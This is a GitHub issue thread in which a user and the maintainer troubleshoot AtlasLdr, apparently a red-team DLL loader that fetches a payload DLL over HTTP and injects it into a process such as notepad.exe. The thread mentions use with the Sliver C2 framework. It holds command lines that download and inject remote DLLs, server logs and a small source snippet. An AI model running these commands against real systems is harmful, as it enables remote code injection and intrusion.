Error receiving the response: 12030 about atlasldr HOT 11 CLOSED

same error but after the change I've made, recompiled and tested the dll being called is the atlas_patcher.dll instead the payload i.dll

I really think on a network issue, thanks much for the help, really appreciate

from atlasldr.

Hi John,

Usually, the error 12030 on winhttp i due a SSL incompatibility, the current version of AtlasLdr only allows to use plain HTTP, HTTPS is currently not supported.

How are you launching your server?

from atlasldr.

thanks for the reply,
for the server part I use python3 -m http.server 8888

from atlasldr.

tried with apache2 instead
PS C:\temp> .\atlas_x64.exe notepad.exe 0 10.22.22.9 80 .\atlas_patcher.dll i.dll isfine
[*] - PID of the target process: 7632

[] - Establishing the connection to the server
[!] - DLL not found in the server: -1
PS C:\temp> .\atlas_x64.exe notepad.exe 1 10.22.22.9 80 .\atlas_patcher.dll i.dll isfine
[] - PID of the target process: 7632

[*] - Establishing the connection to the server
[!] - Error receiving the response: 12030

server side
10.0.1.97 - - [22/Mar/2024:11:14:51 +0100] "GET / HTTP/1.1" 200 3380 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) C hrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0"
10.0.1.97

• [22/Mar/2024:11:14:51 +0100] "GET /icons/openlogo-75.png HTTP/1.1" 200 6040 "http://10.22.22.9/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Ap
  pleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0"
  10.0.1.97 - - [22/Mar/2024:11:14:51 0100] "GET /favicon.ico HTTP/1.1" 404 488
  "http://10.22.22.9/™ "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/5
  37.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0*
  10.0.1.97 - - 22/Mar/2024:11:14:56 +0100]
  "GET /i.dll HTTP/1.1" 200 137240 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like G
  ecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0"
  10.0.1.97 - - 22/Mar/2024:11:14:56 +0100]
  "GET /login/css/latofonts.css HTTP/1.1" 404 489 "http://10.22.22.9/i.dll" "Mozilla/5.0 (Windows NT 10.0; Win64; x

64. AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0"
    10.0.1.97 - - [22/Mar/2024:11:15:12 +0100] "GET /i.dll HTTP/1.1"
    200 143080
    10.0.1.97 - - [22/Mar/2024:11:15:48 0100] "-" 408 0 "-"
    "-"
    "-" "Mozilla/5.0"
    10.0.1.97 - - [22/Mar/2024:11:16:06 0100] "GET /i.dll HTTP/1.1" 200 143080 "-" "Mozilla/5.0"

different error code

from atlasldr.

thanks for the information, I'll have a look at it these days.

what is the size of the DLL you are trying to inject?

from atlasldr.

Hi again @johnjohnsp1 I just realised that you have an error in the way you are using atlas. atlas_patcher.dll must be on the remote server as well as the dll you are trying to inject, you are trying to load atlas_patcher locally and that is not possible. Here is an usage example using Sliver.

from atlasldr.

thanks for the reply,
I did a test with having the atlas_patcher.dll and my dll inside the same folder, but sadly I keep getting the same error.
Once executed the atlas_x64.exe seems on the remote server the atlas dll is not getting retrieved but instead just only my dll is called.
on the server side same error.

surely is something on my environment that is not working
maybe I didn't compile it on windows but on kali box ? probably different mingw versions

really appreciate the help

from atlasldr.

thanks for the reply, I did a test with having the atlas_patcher.dll and my dll inside the same folder, but sadly I keep getting the same error. Once executed the atlas_x64.exe seems on the remote server the atlas dll is not getting retrieved but instead just only my dll is called. on the server side same error.

surely is something on my environment that is not working maybe I didn't compile it on windows but on kali box ? probably different mingw versions

really appreciate the help

use i.dll, isfine

from atlasldr.

sadly won't work even with i.dll, is fine
problem is the atlas_patcher.dll is not appearing during the call of the i.dll
even with a exe file the problem is the same the GET point just at the payload and not the atals_patcher.dll

trying to figure out why don't work, also tried to delete, git clone the repo and build again ... nothing sadly

from atlasldr.

Hi @johnjohnsp1, since I am not able to replicate your problem, could you do the following test?

1. Go to /AtlasLdr/src/AtlasLdr.cpp
2. Change the order of lines 47 - 48, you should put this:

char* atlasPatcher_buffer = ObtainRock(atlas_params.server, atoi(atlas_params.port), atlas_params.atlasPatcher);
char* dll_buffer = ObtainRock(atlas_params.server, atoi(atlas_params.port), atlas_params.dll);

instead of:

char* dll_buffer = ObtainRock(atlas_params.server, atoi(atlas_params.port), atlas_params.dll);
char* atlasPatcher_buffer = ObtainRock(atlas_params.server, atoi(atlas_params.port), atlas_params.atlasPatcher);

try again with this change (compile before trying)

If this fails to retrieve atlas_patcher.dll, it could be an issue in your network

from atlasldr.

Yeah, seems like a weird network problem, for the moment i will close this issue as it looks like is not a Atlas problem, feel free to open another one if you get other problem.

Also, thank you for taking the time to use Atlas

from atlasldr.